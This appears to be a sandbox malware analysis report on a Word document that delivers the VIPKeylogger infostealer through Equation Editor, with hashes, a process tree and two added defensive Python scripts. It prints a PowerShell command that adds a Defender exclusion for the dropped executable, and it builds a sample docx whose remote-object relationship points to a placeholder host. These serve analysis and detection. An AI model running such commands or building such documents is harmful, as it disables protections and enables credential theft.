Analysis

  • max time kernel
    132s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-10-2024 11:41

General

  • Target

    30092463687563.docx

  • Size

    264KB

  • MD5

    da3b3b9590907c35f64e830b2b244ffd

  • SHA1

    8393b61a2871bc1ea9cb2c22fa041790ce8fa5b1

  • SHA256

    97a4fe736ddd0955e218e7f7fb00d2fddee7896db60aa90e175b4824c9192825

  • SHA512

    98d070881920985daa43a793dd5064a4262584f61c34d86d0b51ff9c395ff81712e192b34cef6a1fedb3a274e214f38725b14fdb93aede811043b976ba6a3cf1

  • SSDEEP

    6144:AyrTTW+ch8x2ZpfRkdxyl+cOpFVozXHN5dOP:Dwy2O1c0buXHNXc

Malware Config

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings by adding exclusions for file extensions, paths, or processes. In this run the dropped wealtken20309.exe adds its own path with Add-MpPreference -ExclusionPath (see the process tree below).

  • Downloads MZ/PE file
  • Abuses OpenXML format to download file from external location
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs
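
To triage the "Abuses OpenXML format to download file from external location" behaviour without opening the document in Word, the following added example (not part of the report or the sandbox's own tooling) unpacks a .docx and lists every relationship whose TargetMode is External; in this run the fetched second stage shows up as wealthzxcv[1].doc in the Downloads list. The sample document the script builds is constructed here with a placeholder URL on example.invalid and a minimal part set; it is not the 30092463687563.docx analysed above, and the set of relationship types treated as benign is an assumed policy, not a rule from the OpenXML specification.

```python
"""Static check for external relationships in an OpenXML (.docx) package.

Word follows relationships with TargetMode="External" (attached templates,
remote OLE objects, frames) when the document opens, which is how a
benign-looking docx can pull a second stage from a remote host.  This scanner
opens the package as a zip, parses every *.rels part and reports such targets.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Ordinary documents carry external hyperlinks all the time; every other
# external relationship type is worth a look.  (Assumed triage policy.)
BENIGN_EXTERNAL_TYPES = {"hyperlink"}


def external_relationships(docx_bytes):
    """Return (rels_part, relationship_type, target) for each External relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a .rels part that does not parse deserves manual review
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, rel_type, rel.get("Target", "")))
    return findings


def suspicious_externals(docx_bytes):
    """External relationships of a type Word would fetch and embed, not merely link."""
    return [f for f in external_relationships(docx_bytes)
            if f[1] not in BENIGN_EXTERNAL_TYPES]


def build_sample_docx():
    """Constructed minimal .docx: one remote oleObject relationship (the pattern
    of interest) plus one ordinary external hyperlink (expected noise).
    The URL is a placeholder on example.invalid, not the real delivery host."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '</Types>')
    root_rels = (
        '<Relationships xmlns="%s">' % REL_NS +
        '<Relationship Id="rId1" Type="%sofficeDocument" Target="word/document.xml"/>' % OFFICE_REL +
        '</Relationships>')
    doc_rels = (
        '<Relationships xmlns="%s">' % REL_NS +
        '<Relationship Id="rId1" Type="%soleObject" Target="http://example.invalid/wealthzxcv.doc" TargetMode="External"/>' % OFFICE_REL +
        '<Relationship Id="rId2" Type="%shyperlink" Target="https://example.invalid/" TargetMode="External"/>' % OFFICE_REL +
        '</Relationships>')
    document = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body/></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", root_rels)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rel_type, target in suspicious_externals(build_sample_docx()):
        print("%s: %s -> %s" % (part, rel_type, target))
```

Run it against a real sample by replacing build_sample_docx() with the bytes of the file; a hit in word/_rels/settings.xml.rels of type attachedTemplate or in word/_rels/document.xml.rels of type oleObject with an http target is the remote-template / remote-object pattern and justifies detonating the file, as was done here.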

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2252
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1824
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
        "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1800
        • C:\Users\Admin\AppData\Roaming\wealtken20309.exe
          "C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2568
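
The process tree above carries four relationships a detection engineer would alert on: Equation Editor spawning a child, PowerShell adding a Defender exclusion, an executable relaunching a copy of itself (the report flags SetThreadContext and WriteProcessMemory on the first instance), and executables running out of the user profile. The following added example (not part of the report or the sandbox's own tooling) encodes those four rules and runs them over a record of this tree. The PIDs, image paths and command lines are copied from the report; the record layout is an assumption, and EQNEDT32.EXE is given no parent because the report shows it at the top level, which is what its -Embedding switch (COM activation rather than a direct child of WINWORD.EXE) implies.

```python
"""Process-tree rules for the WINWORD -> EQNEDT32 -> dropped EXE -> PowerShell chain.

The TREE records are constructed from the sandbox report's process tree.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]  # None where the report shows the process at the top level
    image: str
    cmdline: str


WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\Admin\AppData\Roaming\wealtken20309.exe"
PS_IMAGE = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DOCX = r"C:\Users\Admin\AppData\Local\Temp\30092463687563.docx"

# Constructed from the report; EQNEDT32.EXE runs as a COM server (-Embedding),
# so it is not recorded as a child of WINWORD.EXE and its ppid is left None.
TREE = [
    Proc(2252, None, WINWORD, '"' + WINWORD + '" /n "' + DOCX + '"'),
    Proc(1824, 2252, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    Proc(2612, None, EQNEDT, '"' + EQNEDT + '" -Embedding'),
    Proc(2004, 2612, DROPPED, '"' + DROPPED + '"'),
    Proc(1800, 2004, PS_IMAGE,
         '"' + PS_CMD + '" Add-MpPreference -ExclusionPath "' + DROPPED + '"'),
    Proc(2568, 2004, DROPPED, '"' + DROPPED + '"'),
]

Finding = Tuple[str, int]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_eqnedt_spawns_child(tree: List[Proc]) -> List[Finding]:
    """Equation Editor rendering a formula has no reason to start another program."""
    by_pid = {p.pid: p for p in tree}
    return [("eqnedt32_spawns_child", p.pid) for p in tree
            if p.ppid in by_pid and _basename(by_pid[p.ppid].image) == "eqnedt32.exe"]


DEFENDER_EXCL = re.compile(r"add-mppreference.*-exclusion(path|extension|process)", re.I)


def rule_defender_exclusion(tree: List[Proc]) -> List[Finding]:
    """PowerShell adding a Defender exclusion from a non-admin process tree."""
    return [("defender_exclusion_added", p.pid) for p in tree
            if _basename(p.image) == "powershell.exe" and DEFENDER_EXCL.search(p.cmdline)]


def rule_self_respawn(tree: List[Proc]) -> List[Finding]:
    """A binary launching a second copy of itself.  Paired with SetThreadContext
    and WriteProcessMemory on the parent, this is the usual shape of process
    hollowing: the child is a suspended shell that receives the real payload."""
    by_pid = {p.pid: p for p in tree}
    return [("self_respawn", p.pid) for p in tree
            if p.ppid in by_pid and by_pid[p.ppid].image.lower() == p.image.lower()]


def rule_exec_from_user_profile(tree: List[Proc]) -> List[Finding]:
    """Executables run out of AppData: the dropped-EXE case in this chain."""
    return [("exec_from_user_profile", p.pid) for p in tree
            if "\\appdata\\" in p.image.lower() and p.image.lower().endswith(".exe")]


def run_rules(tree: List[Proc] = TREE) -> List[Finding]:
    findings: List[Finding] = []
    for rule in (rule_eqnedt_spawns_child, rule_defender_exclusion,
                 rule_self_respawn, rule_exec_from_user_profile):
        findings.extend(rule(tree))
    return sorted(findings)


if __name__ == "__main__":
    for name, pid in run_rules():
        print("%-26s PID %d" % (name, pid))
```

Against this tree the rules fire on PID 2004 (child of EQNEDT32.EXE, run from AppData), PID 1800 (Defender exclusion) and PID 2568 (self-respawn, run from AppData); WINWORD.EXE and splwow64.exe produce no findings, which is the false-positive check worth keeping when the rules are ported to a real telemetry source.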

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      68988d7dd981fa3061f0b32c8627c1ec

      SHA1

      0800a2e4506ba3568047417e440cbf5a21fe8a5c

      SHA256

      7040d17da449308cf2460522e5495ddaffea8edd787b2be52aa15eae552c478c

      SHA512

      1b6fefaf0fb9c5a4858ba6199dc33262409dcbd07a87c8c5c2ab7370f28b1ea34dea5622551a53d45565d1c7d445882390a41e9896aeba3e3d68e003bb63747f

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{96E47E6C-170C-4C3F-98E1-D8B9A741D571}.FSD

      Filesize

      128KB

      MD5

      7d9680f56b3377f37e05ca9b7683f43e

      SHA1

      63c7960b2cc93379aaf9e92799664ab60729d172

      SHA256

      b91e1013b2113fe1875a1bb44c962db3756d369160b36f0e4cdda1ce70211024

      SHA512

      073a47bf49442efcfd3d41833292d0257dee8103be89255577169335d5381788c7aef30febcf5ee9ab207dee4fb9e864f9408776960b0b65cd51b120e01adfdf

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WCATT3E5\wealthzxcv[1].doc

      Filesize

      565KB

      MD5

      adbffccbb78834fa492cc7ca8a676e52

      SHA1

      1e5b065d13fa03fb556a7ff315b85db96d369908

      SHA256

      42d08df15b74f7a598895de1590dab57cd973d1b4dd8531f88ac3150260f7e63

      SHA512

      de1bb84f11ad4dcf7035699c8b5ca58e098da937a98b8a701ba202671dbb9bf1510434682675b208f3dc804040a9775b11903709f825758e68a19fc9ef2e8b33

    • C:\Users\Admin\AppData\Local\Temp\{5A2B2299-D02A-4F34-8FA6-5E382910A6BE}

      Filesize

      128KB

      MD5

      afa493144346c84ef2d518ebe8930309

      SHA1

      949d73a0a801d92c04f015df239e9719a62108df

      SHA256

      c987711c23a13fe6f2879edf218f2b88a565edf88372958178d755f54a830b3d

      SHA512

      f03c4f097e59935a41dd464c947302acdbc801f2f5ff279283cf0ed5872fdcb2f7b846af7c40875fbace7cb53c8ee344d3b5279da3bd25213ef887788bb32da0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

      Filesize

      412B

      MD5

      64c0da6e5a63888d9890912acced0309

      SHA1

      20151576c22d2469553f31d5f882a0f749800ca4

      SHA256

      ecbb43b054e8615b8227e5317d92c7edec0d87de76294c7c61d4175d7dec8f13

      SHA512

      115e97bd2c6a5decd4be01b608844f0d92c1c02c5b3d6afcc0802adda09d33c4d1b3a7482cfa96fbbbce818352e4f3864627d0b3a49544c409b3b407a2cd30d0

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • C:\Users\Admin\AppData\Roaming\wealtken20309.exe

      Filesize

      858KB

      MD5

      d237ebe34f35a9ffe99f5efe0474c1e2

      SHA1

      573c4774a52cc9ebc7e7408f944ac7f3a27d2fb1

      SHA256

      ebf5271d5f3a9a052cd487e949d80ca43d84bb108dd0cf0c773f2139a57c6137

      SHA512

      9393d9605d72382f7dc154e0dfc7aacd7f0f740c0c3ec7fc3e94a366111edbbb1ca2f64b85cd9f12bd7bccad25d74ed16cff19162b44b95127e61ccc227b9f05

    • memory/2004-96-0x0000000000270000-0x000000000028E000-memory.dmp

      Filesize

      120KB

    • memory/2004-94-0x00000000010D0000-0x00000000011AC000-memory.dmp

      Filesize

      880KB

    • memory/2004-104-0x0000000000440000-0x00000000004CA000-memory.dmp

      Filesize

      552KB

    • memory/2252-2-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2252-0-0x000000002F381000-0x000000002F382000-memory.dmp

      Filesize

      4KB

    • memory/2252-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2252-103-0x0000000070CCD000-0x0000000070CD8000-memory.dmp

      Filesize

      44KB

    • memory/2568-105-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-118-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-116-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-114-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-113-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2568-111-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-109-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB

    • memory/2568-107-0x0000000000400000-0x0000000000448000-memory.dmp

      Filesize

      288KB